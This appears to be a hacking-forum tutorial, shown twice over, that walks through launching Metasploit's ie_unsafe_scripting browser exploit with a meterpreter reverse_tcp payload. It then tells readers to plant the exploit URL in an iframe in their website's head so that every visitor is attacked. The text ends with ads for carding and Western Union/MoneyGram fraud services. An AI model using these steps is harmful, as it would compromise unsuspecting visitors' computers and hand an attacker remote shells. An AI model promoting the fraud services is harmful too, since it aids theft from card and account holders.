We are going to search for a windows exploit in metasploit!
TERMINAL COMMANDS IN LIGHT GREEN FOR ANYONE WHO DOSN'T KNOW
Step 1: Find the Exploit
msf> search type:exploit platform:windows unsafe
This will bring up a long list of exploits
we are gonna choose
windows/browser/ie_unsafe_scripting
Step 2: Using the exploit
msf> use windows/browser/ie_unsafe_scripting
Step 3: Use a payload
In this case we will use Meterpreter/reverse_tcp
msf> set PAYLOAD windows/meterpreter/reverse_tcp
Step 4: Check what options to use!
msf> show options
We have to use a LHOST!
Step 5: Set Local Host
msf> set LHOST 192.168.1.100
We dont need an RHOST cos this is a client side attack.
Step 6: Executing the exploit!
msf> exploit (ie_unsafe_scripting) > exploit
Now your server is started and waiting for people to visit it!
A smart idea is to add the url to an iframe!
Step 7: Setting up URL to an <IFRAME> Tag
<iframe src=" "></iframe>
Set this in any of the <head> sections on your website .html files!
Whenever a visitor visists the .html link of your website it will load the iframe and exploit them!
Please remember this is not a 0 day exploit, so before screaming "THIS DOSN'T WORK" please take your time to understand that its an IE8 exploit made for when Windows 7 first came out
TERMINAL COMMANDS IN LIGHT GREEN FOR ANYONE WHO DOSN'T KNOW
Step 1: Find the Exploit
msf> search type:exploit platform:windows unsafe
This will bring up a long list of exploits
we are gonna choose
windows/browser/ie_unsafe_scripting
Step 2: Using the exploit
msf> use windows/browser/ie_unsafe_scripting
Step 3: Use a payload
In this case we will use Meterpreter/reverse_tcp
msf> set PAYLOAD windows/meterpreter/reverse_tcp
Step 4: Check what options to use!
msf> show options
We have to use a LHOST!
Step 5: Set Local Host
msf> set LHOST 192.168.1.100
We dont need an RHOST cos this is a client side attack.
Step 6: Executing the exploit!
msf> exploit (ie_unsafe_scripting) > exploit
Now your server is started and waiting for people to visit it!
A smart idea is to add the url to an iframe!
Step 7: Setting up URL to an <IFRAME> Tag
<iframe src=" "></iframe>
Set this in any of the <head> sections on your website .html files!
Whenever a visitor visists the .html link of your website it will load the iframe and exploit them!
Please remember this is not a 0 day exploit, so before screaming "THIS DOSN'T WORK" please take your time to understand that its an IE8 exploit made for when Windows 7 first came out
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding